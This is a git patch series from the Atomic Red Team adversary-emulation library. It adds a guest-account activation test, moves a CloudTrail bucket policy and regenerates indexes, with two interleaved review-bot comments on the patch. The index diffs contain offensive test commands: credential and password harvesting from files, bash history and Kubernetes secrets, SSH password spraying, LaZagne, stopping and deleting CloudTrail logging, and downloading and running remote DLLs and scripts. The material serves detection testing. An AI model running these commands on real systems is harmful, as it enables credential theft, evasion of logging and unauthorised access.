@@ -627,6 +630,7 @@ lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Man lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 12dbc257..68898e7c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -264,6 +264,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
@@ -488,6 +489,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] @@ -928,6 +930,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] @@ -1660,6 +1663,7 @@ - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index a3558cd7..d0f286c9 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -199,6 +199,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -352,6 +353,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] @@ -666,6 +668,7 @@ - Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows] - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - [T1136.002 Domain Account](../../T1136.002/T1136.002.md) - Atomic Test #1: Create a new Windows domain admin user [windows] - Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows] 
@@ -1151,6 +1154,7 @@ - T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1078.001 Default Accounts](../../T1078.001/T1078.001.md) - Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows] + - Atomic Test #2: Activate Guest Account [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 4cfe28ae..a7d4214d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -11730,6 +11730,23 @@ privilege-escalation: if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true + - name: Activate Guest Account + auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda + description: 'The Adversaries can activate the default Guest user. The guest + account is inactivated by default + +' + supported_platforms: + - windows + executor: + command: 'net user guest /active:yes + +' + cleanup_command: 'net user guest /active:no + +' + name: command_prompt + elevation_required: true T1078.002: technique: external_references: 
@@ -21955,6 +21972,23 @@ defense-evasion: if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true + - name: Activate Guest Account + auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda + description: 'The Adversaries can activate the default Guest user. The guest + account is inactivated by default + +' + supported_platforms: + - windows + executor: + command: 'net user guest /active:yes + +' + cleanup_command: 'net user guest /active:no + +' + name: command_prompt + elevation_required: true T1578.003: technique: external_references: @@ -40439,6 +40473,23 @@ persistence: if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true + - name: Activate Guest Account + auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda + description: 'The Adversaries can activate the default Guest user. The guest + account is inactivated by default + +' + supported_platforms: + - windows + executor: + command: 'net user guest /active:yes + +' + cleanup_command: 'net user guest /active:no + +' + name: command_prompt + elevation_required: true T1136.002: technique: created: '2020-01-28T14:05:17.825Z' 
@@ -68890,6 +68941,23 @@ initial-access: if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1) name: command_prompt elevation_required: true + - name: Activate Guest Account + auto_generated_guid: aa6cb8c4-b582-4f8e-b677-37733914abda + description: 'The Adversaries can activate the default Guest user. The guest + account is inactivated by default + +' + supported_platforms: + - windows + executor: + command: 'net user guest /active:yes + +' + cleanup_command: 'net user guest /active:no + +' + name: command_prompt + elevation_required: true T1078.002: technique: external_references: diff --git a/atomics/T1078.001/T1078.001.md b/atomics/T1078.001/T1078.001.md index 250f7d3f..e8586c71 100644 --- a/atomics/T1078.001/T1078.001.md +++ b/atomics/T1078.001/T1078.001.md @@ -8,6 +8,8 @@ Default accounts are not limited to client machines, rather also include account - [Atomic Test #1 - Enable Guest account with RDP capability and admin privileges](#atomic-test-1---enable-guest-account-with-rdp-capability-and-admin-privileges) +- [Atomic Test #2 - Activate Guest Account](#atomic-test-2---activate-guest-account) +
@@ -58,4 +60,36 @@ if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentCon +
+
+ +## Atomic Test #2 - Activate Guest Account +The Adversaries can activate the default Guest user. The guest account is inactivated by default + +**Supported Platforms:** Windows + + +**auto_generated_guid:** aa6cb8c4-b582-4f8e-b677-37733914abda + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +net user guest /active:yes +``` + +#### Cleanup Commands: +```cmd +net user guest /active:no +``` + + + + +
From cbd8ea2e6022d6152555b7236553f320c75bc469 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy
Date: Thu, 12 Aug 2021 09:04:10 +0530
Subject: [PATCH 15/39] updated cleanup command

---
 atomics/T1562.008/T1562.008.yaml | 3 ++-
 atomics/T1562.008/src/policy.json | 28 ++++++++++++++++++++++++++++
 2 files changed, 30 insertions(+), 1 deletion(-)
 create mode 100644 atomics/T1562.008/src/policy.json

diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml
index ccddbecf..c6689e43 100644
--- a/atomics/T1562.008/T1562.008.yaml
+++ b/atomics/T1562.008/T1562.008.yaml
@@ -26,7 +26,7 @@ atomic_tests:
 prereq_command: |
 cat ~/.aws/credentials | grep "default"
 aws s3api create-bucket --bucket #{s3_bucket_name} --region #{region}
- aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/policy.json
+ aws s3api put-bucket-policy --bucket redatomic-test --policy file://$PathToAtomicsFolder/T1562.008/src/policy.json
 get_prereq_command: |
 echo Please install the aws-cli and configure your AWS defult profile using: aws configure
 executor:
@@ -35,6 +35,7 @@ atomic_tests:
 aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
 aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
 aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
+ cleanup_command: |
 aws s3 rb s3://#{s3_bucket_name} --force
 name: sh
 elevation_required: false
diff --git a/atomics/T1562.008/src/policy.json b/atomics/T1562.008/src/policy.json
new file mode 100644
index 00000000..ac55e733
--- /dev/null
+++ b/atomics/T1562.008/src/policy.json
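Review bot: The put-bucket-policy line this hunk rewrites still targets a hard-coded `--bucket redatomic-test`, while the create-bucket line two lines above uses the `#{s3_bucket_name}` input argument; anyone who overrides that argument either ends up with a bucket that has no CloudTrail policy (so the trail commands in the executor will presumably fail) or applies the policy to an unrelated bucket of the same name that the caller happens to own. Since the referenced policy file also embeds the fixed ARN `arn:aws:s3:::redatomic-test`, the fix needs both halves: `aws s3api put-bucket-policy --bucket #{s3_bucket_name} --policy file://...` and a policy document whose ARNs are rewritten to the same name (for example via `sed` into a temp file) before it is applied. The new `cleanup_command` runs `aws s3 rb s3://#{s3_bucket_name} --force`, which deletes every object in whatever bucket that argument resolves to, so the test description should state that the name must be a throwaway bucket. Note also that `aws s3api create-bucket --region #{region}` without `--create-bucket-configuration LocationConstraint=#{region}` is rejected for any region other than us-east-1. The enclosing `atomic_tests` entry begins before the first hunk.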
@@ -0,0 +1,28 @@
+{
+ "Version": "2012-10-17",
+ "Statement": [
+ {
+ "Sid": "AWSCloudTrailAclCheck20150319",
+ "Effect": "Allow",
+ "Principal": {
+ "Service": "cloudtrail.amazonaws.com"
+ },
+ "Action": "s3:GetBucketAcl",
+ "Resource": "arn:aws:s3:::redatomic-test"
+ },
+ {
+ "Sid": "AWSCloudTrailWrite20150319",
+ "Effect": "Allow",
+ "Principal": {
+ "Service": "cloudtrail.amazonaws.com"
+ },
+ "Action": "s3:PutObject",
+ "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
+ "Condition": {
+ "StringEquals": {
+ "s3:x-amz-acl": "bucket-owner-full-control"
+ }
+ }
+ }
+ ]
+}

From b1b3ec86bf845c9a301c972e61fa599deb519e08 Mon Sep 17 00:00:00 2001
From: Araveti Esanya Reddy <88440780+esanyaCode@users.noreply.github.com>
Date: Thu, 12 Aug 2021 09:06:22 +0530
Subject: [PATCH 16/39] Delete policy.json

---
 atomics/T1562.008/policy.json | 28 ----------------------------
 1 file changed, 28 deletions(-)
 delete mode 100644 atomics/T1562.008/policy.json

diff --git a/atomics/T1562.008/policy.json b/atomics/T1562.008/policy.json
deleted file mode 100644
index ac55e733..00000000
--- a/atomics/T1562.008/policy.json
+++ /dev/null
@@ -1,28 +0,0 @@
-{
- "Version": "2012-10-17",
- "Statement": [
- {
- "Sid": "AWSCloudTrailAclCheck20150319",
- "Effect": "Allow",
- "Principal": {
- "Service": "cloudtrail.amazonaws.com"
- },
- "Action": "s3:GetBucketAcl",
- "Resource": "arn:aws:s3:::redatomic-test"
- },
- {
- "Sid": "AWSCloudTrailWrite20150319",
- "Effect": "Allow",
- "Principal": {
- "Service": "cloudtrail.amazonaws.com"
- },
- "Action": "s3:PutObject",
- "Resource": "arn:aws:s3:::redatomic-test/AWSLogs/*",
- "Condition": {
- "StringEquals": {
- "s3:x-amz-acl": "bucket-owner-full-control"
- }
- }
- }
- ]
-}

From 74de7af42f0b9e7270073a2e5ebfa906081aa61a Mon Sep 17 00:00:00 2001
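Review bot: Both statements in the new policy grant the `cloudtrail.amazonaws.com` service principal access with no `aws:SourceArn` or `aws:SourceAccount` condition, so a trail in any other AWS account can also deliver objects into this bucket; that is the confused-deputy case the AWS-documented CloudTrail bucket-policy template closes with a source condition. Add to each statement a condition such as `"aws:SourceArn": "arn:aws:cloudtrail:<region>:<account-id>:trail/<trail-name>"` (merged into the existing `StringEquals` block of the second statement), or at minimum `"aws:SourceAccount": "<account-id>"`. The two `Resource` ARNs also hard-code `redatomic-test`, so the file silently stops matching the bucket as soon as the test's `s3_bucket_name` argument is changed; strict JSON cannot carry a comment, so that coupling should be recorded in the test description or the file treated as a template that the test rewrites. The deletion hunk that follows only removes the old copy of the same file.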
From: Jose Enrique Hernandez Date: Mon, 16 Aug 2021 09:54:02 -0400 Subject: [PATCH 17/39] adding new platform layer generation (#1599) --- .../art-navigator-layer-azure-ad.json | 1 + .../art-navigator-layer-containers.json | 1 + .../art-navigator-layer-google-workspace.json | 1 + .../art-navigator-layer-iaas-aws.json | 1 + .../art-navigator-layer-iaas-azure.json | 1 + .../art-navigator-layer-iaas-gcp.json | 1 + .../art-navigator-layer-iaas.json | 1 + .../art-navigator-layer-office-365.json | 1 + atomics/Indexes/index.yaml | 3562 ++++++++--------- bin/generate-atomic-docs.rb | 95 +- 10 files changed, 1882 insertions(+), 1783 deletions(-) create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json create mode 100644 atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json new file mode 100644 index 00000000..26b3b6a1 --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json 
@@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Azure-AD)","description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json new file mode 100644 index 00000000..5dc65d44 --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json 
@@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Containers)","description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json new file mode 100644 index 00000000..6a5ee1b8 --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json @@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Google-Workspace)","description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json new file mode 100644 index 00000000..9959b6ba --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json @@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Iaas:AWS)","description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json new file mode 100644 index 00000000..046918fc --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json @@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Iaas:Azure)","description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json new file mode 100644 index 00000000..0a1bfbf4 --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json @@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Iaas:GCP)","description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json new file mode 100644 index 00000000..9964aaea --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json @@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Iaas)","description":"Atomic Red Team (Iaas) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json new file mode 100644 index 00000000..ca1d359c --- /dev/null +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json 
@@ -0,0 +1 @@ +{"version":"4.1","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]} \ No newline at end of file diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a7d4214d..17a1436d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -61,7 +61,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: bash elevation_required: true - name: Access /etc/passwd (Local) @@ -80,7 +80,7 @@ credential-access: cat #{output_file} cleanup_command: 'rm -f #{output_file} -' + ' name: sh T1557.002: technique: @@ -293,7 +293,7 @@ credential-access: description: 'Search through bash history for specifice commands we want to capture -' + ' supported_platforms: - linux - macos @@ -315,7 +315,7 @@ credential-access: command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} -' + ' name: sh T1110: technique: @@ -550,7 +550,7 @@ credential-access: pod service account, for example) can access sensitive information that might include credentials to various services. -' + ' supported_platforms: - containers input_arguments: @@ -561,17 +561,17 @@ credential-access: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get secrets -n #{namespace} -' + ' name: bash elevation_required: false - name: Cat the contents of a Kubernetes service account token file @@ -579,7 +579,7 @@ credential-access: description: 'Access the Kubernetes service account access token stored within a container in a cluster. -' + ' supported_platforms: - linux dependency_executor_name: sh 
@@ -587,24 +587,24 @@ credential-access: - description: Verify docker is installed. prereq_command: 'which docker -' + ' get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi -' + ' - description: Verify docker service is running. prereq_command: 'sudo systemctl status docker -' + ' get_prereq_command: 'sudo systemctl start docker -' + ' - description: Verify kind is in the path. prereq_command: 'which kind -' + ' get_prereq_command: | curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind @@ -612,14 +612,14 @@ credential-access: - description: Verify kind-atomic-cluster is created prereq_command: 'sudo kind get clusters -' + ' get_prereq_command: 'sudo kind create cluster --name atomic-cluster -' + ' - description: Verify kubectl is in path prereq_command: 'which kubectl -' + ' get_prereq_command: | curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl @@ -627,19 +627,19 @@ credential-access: - description: Verify atomic-pod is running. prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod -' + ' get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod --image=alpine --command -- sleep infinity -' + ' executor: command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token -' + ' name: sh cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod -' + ' T1056.004: technique: external_references: @@ -741,7 +741,7 @@ credential-access: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications -' + ' supported_platforms: - windows input_arguments: 
@@ -757,10 +757,10 @@ credential-access: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) -' + ' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" @@ -846,7 +846,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - linux input_arguments: @@ -858,16 +858,16 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; -' + ' executor: name: bash elevation_required: false @@ -879,7 +879,7 @@ credential-access: description: 'Using username,password combination from a password dump to login over SSH. -' + ' supported_platforms: - macos input_arguments: @@ -891,11 +891,11 @@ credential-access: dependencies: - description: 'Requires SSHPASS -' + ' prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install.sh)" brew install hudochenkov/sshpass/sshpass @@ -991,14 +991,14 @@ credential-access: executor: command: 'python2 laZagne.py all -' + ' elevation_required: true name: bash - name: Extract passwords with grep auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4 description: 'Extracting credentials from files -' + ' supported_platforms: - macos - linux 
@@ -1010,14 +1010,14 @@ credential-access: executor: command: 'grep -ri password #{file_path} -' + ' name: sh - name: Extracting passwords with findstr auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513 description: 'Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed. -' + ' supported_platforms: - windows executor: @@ -1043,7 +1043,7 @@ credential-access: description: 'This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found. -' + ' supported_platforms: - macos - linux @@ -1107,7 +1107,7 @@ credential-access: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { New-Object -COMObject "word.Application" | Out-Null @@ -1118,7 +1118,7 @@ credential-access: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -1127,7 +1127,7 @@ credential-access: cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore -' + ' name: powershell - name: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] @@ -1154,7 +1154,7 @@ credential-access: command: 'IEX (IWR 